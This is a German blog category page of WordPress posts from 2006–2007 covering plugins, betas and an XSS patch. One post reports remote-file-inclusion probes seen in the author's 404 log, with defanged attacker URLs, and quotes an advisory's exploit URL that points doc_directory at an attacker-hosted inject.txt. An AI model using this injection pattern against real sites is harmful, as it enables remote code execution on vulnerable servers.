Software Guide

Die besten Tipps, Anleitungen und Downloads

Ihre Werbung auf Software Guide

Sie möchten in dieser Box oder an anderer Stelle dieser Webseiten eine Werbung schalten? Sehen Sie sich dazu am besten einfach mal die verschiedenen Möglichkeiten an.


Blog-Kategorie: Wordpress (Seite 4/8)

WordPress Ticker (4)

2. Februar 2007 von Michael | Wordpress

Im Folgenden der nächste Beitrag der WordPress-Ticker-Reihe.

Weiterlesen…


WordPress Ticker (3)

26. Januar 2007 von Michael | Wordpress

Hier der nächste Beitrag der WordPress-Ticker-Reihe, in der regelmäßig News zum Blogsystem WordPress veröffentlicht werden.
Weiterlesen…


WordPress Ticker (2)

21. Januar 2007 von Michael | Wordpress

Im Folgenden der nächste Teil des WordPress-Tickers, der nun regelmäßig erscheinen wird.

Weiterlesen…


WordPress Ticker

18. Januar 2007 von Michael | Wordpress

Um die Anzahl an WordPress-Beiträgen hier im Blog etwas zu reduzieren und die Nicht-Wordpress-Interessierten nicht zu langweilen (u.a. Serendipity lässt grüßen :-), möchte bzw. werde ich zukünftig WordPress-News hier im Ticker-Format vorstellen, d.h. es gibt hier nun regelmäßig Blogbeiträge, in denen zusammenfassend Neuigkeiten oder wissenswerte Dinge zu WordPress gelistet werden. Dadurch gibt es nur noch einen regelmäßig erscheinenden zusammengefassten Beitrag anstatt vieler Einzelbeiträge. Themen, die ich für besonders erwähnenswert erachte, werden natürlich nach wie vor separat behandelt.

Weiterlesen…


Tagging-Gezeter bei WordPress

13. Januar 2007 von Michael | Wordpress

Aktuelle Situation zum Tagging unter WordPress

WordPress wird von allen Blogsystemen am häufigsten eingesetzt. Beim Bloggen ist dabei dasTagging nicht mehr wegzudenken. Allerdings kann man mit dem Blog-System WordPress von Haus aus keine Artikel taggen, Tagging ist schlichtweg erstmal nicht existent.

Um mit WordPress trotzdem taggen zu können, muss man ein Plugin einsetzen. Die dabei am weitesten verbreiteten Plugins sind Ultimate Tag Warrior (UTW) und Jerome’s Keywords.

UTW ist bei vielen das Plugin der Wahl, es bietet sehr viele Möglichkeiten für die Ausgabe. Immer wieder hört man aber über UTW, dass es Performanceprobleme verursacht. Mittlerweile gibt es sogar schon ein Zusatzplugin, welches UTW-Performance-Probleme beheben soll, siehe Ultimate Tag Warrior Tuning.

Jerome’s Keywords (JK) ist gegenüber UTW ein Leichtgewicht und wohl sehr viel performanter, bietet aber trotzdem alle wesentlichen Features (Tag Cloud, Tags zu Artikel anzeigen, etc.).
Problem bei JK: Die aktuelle Version ist immer noch im Beta-Status, der Autor scheint nicht wirklich an der Fertigstellung interessiert zu sein, sein Blog liefert auch seit Monaten keine neuen Beiträge. Zudem berichten manche Anwender von Bugs dieses Plugins.
Weiterlesen…


Wer hat Lust auf WordPress-Plugin-Betatest?

5. Januar 2007 von Michael | Wordpress

Ausgangssituation

Wenn man in WordPress einen neuen Artikel schreibt und z.B. auf „Zwischenspeichern“ klickt, so wird die Seite neu geladen und am Ende der Seite wird in einem iFrame die komplette Webseite angezeigt, und diese enthält den bisherigen Artikeltext.
Einerseits ist das toll, weil man 1:1 sieht, wie der Artikel aussehen wird, ob Bilder richtig positioniert sind, etc.

Ein gravierender Nachteil ist jedoch, dass das Laden der Seite dadurch sehr viel Zeit in Anspruch nimmt, es dauert zum Teil „ewig“, bis das Admin-Interface aufgebaut ist, gerade wenn man im Blog externe Dinge wie Adense, Counter, 80×15-Buttons, YouTube-Videos, etc. von extern eingebunden hat.

Außerdem ist es zwar bei DSL-Flatrate egal, wenn immer die komplette Seite inkl. Header, Sidebar, Footer etc. geladen wird, aber es gibt immer noch einige Leute, die per ISDN oder sogar analog angebunden sind.

Weiterlesen…


Gute und schlechte Neuigkeit zu WordPress

4. Januar 2007 von Michael | Wordpress

WordPress 2.1 Beta1 Download:

Ja, es gibt nun die erste Beta-Version zu WordPress 2.1, Direktdownload (zip, 835k). Habe ich bei teezeh dot de gelesen, der gleich schon mal upgegraded hat, eine offizielle Ankündigung gab es aber wohl (noch) nicht.

WordPress Sicherheitslücke:

Frank Bültge weist auf eine WordPress-Sicherheitslücke hin, die alle aktuellen WordPress-Versionen einschließlich 2.0.5 betrifft, wobei Frank schreibt, dass der Fehler auch in der 2.0.6 beta 1 nicht behoben ist.

Bekannt ist diese Lücke wohl schon seit dem 27. Dezember, wie man bei dem Entdecker (?) Operation n nachlesen kann. techbuzz listet alle betroffenen stabilen WordPress-Versionen.

Einen Patch kann man im WordPress-Trac downloaden, oder man folgt den Anweisungen von Frank.

Es handelt sich hierbei übrigens um eine sog. XSS-Lücke, welche grundsätzlich sehr ernst zu nehmen sind.

  • Update (Fr 5. Januar 2007):
    Mittlerweile wurde WordPress 2.0.6 herausgebracht und kann hier heruntergeladen werden, diese Version enthält diese Sicherheitslücke nicht mehr.
    Zudem soll WordPress 2.1 auch bald kommen, wie Matt schreibt. In mehreren Blogs liest man, die finale Version soll angeblich noch in diesem Monat kommen.
  • Update (So 7. Januar 2007):
    Mit WordPress 2.0.6 kann es Probleme geben, wenn man den Webservice Feedburner nutzt. Eine Lösung gibt es bei neosmart.net. Im Prinzip muss man 3 Zeilen der Datei wp-includes/functions.php auskommentieren, man kann auch einfach die bereits modifizierte functions.php hier herunterladen und mit der bestehenden ersetzen.

WordPress: Attacken wegen aktivierter Permalinks

2. Januar 2007 von Michael | Wordpress

Erst kürzlich habe ich das WordPress-Plugin Log 404 installiert. Dieses Plugin zeichnet die 100 letzten 404-Fehler („Webseite nicht gefunden“) auf und ist damit eine prima Admin-Unterstützung, um tote Links aufzuspüren, die man ggf. umbiegen sollte, weil regelmäßig darauf zugegriffen wird.

Ich habe das Plugin ein paar Tagen im Einsatz und stelle nun immer wieder Massen-Zugriffe auf folgenden Pfad fest:

sw-guide.de/wordpress/lib_comment/comment.php?doc_directory=
hxxp://artelj.com/c.ar?
sw-guide.de/wordpress/lib_comment/comment.php?doc_directory=
hxxp://empzone.com/c.ar??

Bei Software Guide gibt es weder den Verzeichnispfad /wordpress/lib_comment/ noch gibt es dort diese comment.php. Googlen nach lib_comment/comment.php?doc_directory bringt aber einschlägige Ergebnisse zu Tage:

OpenDock Full Core contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to sw/lib_comment/comment.php not properly sanitizing user input supplied to the ‚doc_directory‘ variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.
(…)
Solution:
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
(…)
http://[target]/[OpenDockFullCore_Path]/sw/lib_comment/comment.php?doc_directory=
http://[attacker]/inject.txt?

Was bedeutet das jetzt?
Weiterlesen…


Aktualisierte WordPress-Plugin-Liste

29. Dezember 2006 von Michael | Wordpress

Im Rahmen des Software-Guide-Redesign habe ich auch die WordPress-Plugin-Liste aktualisiert, in der ich aus meiner Sicht sehr empfehlenswerte WordPress-Plugins liste und beschreibe.


Blog Optimization und wie man erkennt ob ein Blog interessant für einen ist

25. Dezember 2006 von Michael | Wordpress

In letzter Zeit hört man immer wieder von Social Media Optimization, also die Optimierung von Webseiten, damit diese leichter bei Social-Media-Diensten (del.icio.us etc.) aufgenommen werden können.

Aber eigentlich kommen die Blogs selbst dabei viel zu kurz. Was bringt es mir als Blog-Leser, wenn meine Lieblings-Blogs 17 verschiedene Bookmark-Links anbieten? Als Nutzer eines Social-Bookmarking-Service hab ich eh einen Button im Browser, womit ich per Mausklick Seiten aufnehmen kann, denn sonst wären ja alle Webseiten ausgeschlossen, die diese Bookmark-Links nicht anbieten. Wohl deshalb werden diese Buttons auch so selten genutzt, wie einige Blog-Beiträge der letzten Monate zeigten.

Ich denke aber, wir brauchen eine andere Art der Optimierung:
Auf was achtet Ihr, wenn Ihr über ein neues Blog stolpert, sei es aufgrund eines Kommentars, eines Trackbacks bei Euch im Blog, einer Empfehlung, oder was auch immer? Klar, in erster Linie auf die Inhalte der letzten Beiträge, und wenn das Blog interessant ist, wird es abonniert. Manche zögern aber vielleicht vor neuen Abos, eigentlich hat man ja eh schon zu viele Blogs im Feedreader abonniert und immer zu wenig Zeit. Was gut ist, soll aber trotzdem rein. Nur: was ist wirklich gut? Man hat auch nicht immer Zeit, mal schnell die letzten 10-20 Artikel zu lesen um sich ein Bild zu machen.

Ich persönlich interessiere mich bei der Entscheidungsfindung für ein paar Eckdaten, u.a. wie lange es ein Blog schon gibt und die ungefähre Anzahl Besucher. Klar, das sagt nichts zur Qualität der Beiträge aus, aber kann als ein Kriterium zur Schnell-Einstufung dienen. Diese Daten zusammen mit den letzten x quergelesenen Beiträgen kann durchaus hilfreich sein, um ein Blog binnen weniger Sekunden einschätzen zu können.

Ich würde folgendes super hilfreich in Sidebars finden, im Beispiel mal von SW-Guide.de:
sidebar.png

Damit könnte man sich schon mal einen guten schnellen Überblick verschaffen. Hilfreich ist dabei, wenn die Tagcloud neben den Tags die Anzahl der Beiträge anzeigt, was fast alle Tagging-Tools der Blog-Systeme bieten. Die Blogroll halte ich u.U. auch für relevant, denn damit kann man sehen, was der Blogger sonst noch so liest. Wichtig: Die Blogroll muss hierbei auch gepflegt sein, es bringt nix, wenn diese 1 Jahr alt ist, denn damit vermittelt sie dem Besucher und potentiellen Stammleser einen falschen Eindruck!

In ein paar Tagen oder Wochen (je nachdem wie ich Zeit habe) wird es ein neues Design für den Software Guide geben, und ich werde eine solche Info-Box in der Sidebar gut sichtbar einbauen, dann wird sich herausstellen ob sich das bewährt ;)

Wie stuft Ihr Blogs auf die schnelle ein, wäre eine solche Info-Box hilfreich für Euch in anderen Blogs, die Ihr zum ersten mal besucht? Und was würdet Ihr noch gerne in einer solchen Info-Box als Kurzinformation sehen wollen?

Blog-Kategorien

Volltextsuche

Neueste Artikel

Neueste Kommentare

Neueste Trackbacks/Pingbacks

Andere Projekte

Blogparade

dient als zentrale Anlaufstelle für Blog-Paraden bzw. Blog-Karnevals und andere von BloggerInnen veranstaltete Aktionen.

Mediadaten

Feed-Statistik:
Feedburner

Software Guide gibt es seit Dezember 2005 und es werden durchschnittlich 4 Blog- Beiträge/Monat veröffentlicht. Die Themenschwerpunkte sind in der Tagcloud ersichtlich. Mehr Infos...

Links

 

Nach oben

Wordpress

© 2005-2017 Software Guide | ISSN 1864-9599